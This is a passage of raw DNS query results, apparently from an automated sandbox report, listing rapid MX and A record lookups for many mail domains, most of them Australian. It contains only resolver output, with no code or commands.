                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.725191116 CET8.8.8.8192.168.2.30xf4c2No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.752465010 CET8.8.8.8192.168.2.30x4f34No error (0)zincmedia-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.752465010 CET8.8.8.8192.168.2.30x4f34No error (0)zincmedia-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.802628040 CET8.8.8.8192.168.2.30x5b6aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.802628040 CET8.8.8.8192.168.2.30x5b6aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.802628040 CET8.8.8.8192.168.2.30x5b6aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.821602106 CET8.8.8.8192.168.2.30x1d73No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.893922091 CET8.8.8.8192.168.2.30x3b87No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.893922091 CET8.8.8.8192.168.2.30x3b87No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.913840055 CET8.8.8.8192.168.2.30x9d8bNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.972024918 CET8.8.8.8192.168.2.30x6d12No error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.991625071 CET8.8.8.8192.168.2.30xc337No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.084253073 CET8.8.8.8192.168.2.30xfbd5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.084253073 CET8.8.8.8192.168.2.30xfbd5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.084253073 CET8.8.8.8192.168.2.30xfbd5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.102423906 CET8.8.8.8192.168.2.30x62eNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.149089098 CET8.8.8.8192.168.2.30x8acdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.149089098 CET8.8.8.8192.168.2.30x8acdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.149089098 CET8.8.8.8192.168.2.30x8acdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.168752909 CET8.8.8.8192.168.2.30x1058No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.242486954 CET8.8.8.8192.168.2.30x657cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.242486954 CET8.8.8.8192.168.2.30x657cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.242486954 CET8.8.8.8192.168.2.30x657cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.262996912 CET8.8.8.8192.168.2.30x640aNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.685864925 CET8.8.8.8192.168.2.30x385aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.685864925 CET8.8.8.8192.168.2.30x385aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.685864925 CET8.8.8.8192.168.2.30x385aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.712487936 CET8.8.8.8192.168.2.30x3b1No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.714581966 CET8.8.8.8192.168.2.30x7058No error (0)free.fr.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.733805895 CET8.8.8.8192.168.2.30xf6e6No error (0)dsto.defence.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.733805895 CET8.8.8.8192.168.2.30xf6e6No error (0)dsto.defence.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.734034061 CET8.8.8.8192.168.2.30x3833No error (0)park-mx.above.com103.224.212.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.796888113 CET8.8.8.8192.168.2.30x67d2No error (0)activ8.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.796888113 CET8.8.8.8192.168.2.30x67d2No error (0)activ8.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.855042934 CET8.8.8.8192.168.2.30x2ed2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.855042934 CET8.8.8.8192.168.2.30x2ed2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.855042934 CET8.8.8.8192.168.2.30x2ed2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.881695986 CET8.8.8.8192.168.2.30xb577No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.956152916 CET8.8.8.8192.168.2.30xfcddNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.956152916 CET8.8.8.8192.168.2.30xfcddNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:47.974073887 CET8.8.8.8192.168.2.30x5f76No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.006874084 CET8.8.8.8192.168.2.30x45e6No error (0)csiro.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.006874084 CET8.8.8.8192.168.2.30x45e6No error (0)csiro.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.049259901 CET8.8.8.8192.168.2.30x26adNo error (0)act-mx.csiro.au150.229.7.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.074182987 CET8.8.8.8192.168.2.30xa5b7No error (0)actmail.defence.gov.au203.6.68.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.075493097 CET8.8.8.8192.168.2.30x8699No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.075493097 CET8.8.8.8192.168.2.30x8699No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.104185104 CET8.8.8.8192.168.2.30x78bdNo error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.108176947 CET8.8.8.8192.168.2.30xd628No error (0)mx01.activ8.net.au116.250.254.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.126528025 CET8.8.8.8192.168.2.30x7a1aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.126528025 CET8.8.8.8192.168.2.30x7a1aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.126528025 CET8.8.8.8192.168.2.30x7a1aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.149807930 CET8.8.8.8192.168.2.30x53fNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.225369930 CET8.8.8.8192.168.2.30x7cc5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.225369930 CET8.8.8.8192.168.2.30x7cc5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.225369930 CET8.8.8.8192.168.2.30x7cc5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.248665094 CET8.8.8.8192.168.2.30x8ebbNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.299424887 CET8.8.8.8192.168.2.30xd689No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.324295998 CET8.8.8.8192.168.2.30xe0d4No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.324295998 CET8.8.8.8192.168.2.30xe0d4No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.373780012 CET8.8.8.8192.168.2.30x1408No error (0)aceradio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.373780012 CET8.8.8.8192.168.2.30x1408No error (0)aceradio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.373780012 CET8.8.8.8192.168.2.30x1408No error (0)aceradio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.402770042 CET8.8.8.8192.168.2.30x554fNo error (0)alt2.aspmx.l.google.com74.125.200.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.407675982 CET8.8.8.8192.168.2.30xd49cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.407675982 CET8.8.8.8192.168.2.30xd49cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.407675982 CET8.8.8.8192.168.2.30xd49cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.432007074 CET8.8.8.8192.168.2.30xacadNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.474394083 CET8.8.8.8192.168.2.30x4e60No error (0)mail.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.492984056 CET8.8.8.8192.168.2.30xca16No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.492984056 CET8.8.8.8192.168.2.30xca16No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.683237076 CET8.8.8.8192.168.2.30xd089No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.683237076 CET8.8.8.8192.168.2.30xd089No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.683237076 CET8.8.8.8192.168.2.30xd089No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.714920998 CET8.8.8.8192.168.2.30x9961No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.738471985 CET8.8.8.8192.168.2.30x5a4fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.738471985 CET8.8.8.8192.168.2.30x5a4fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.738471985 CET8.8.8.8192.168.2.30x5a4fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
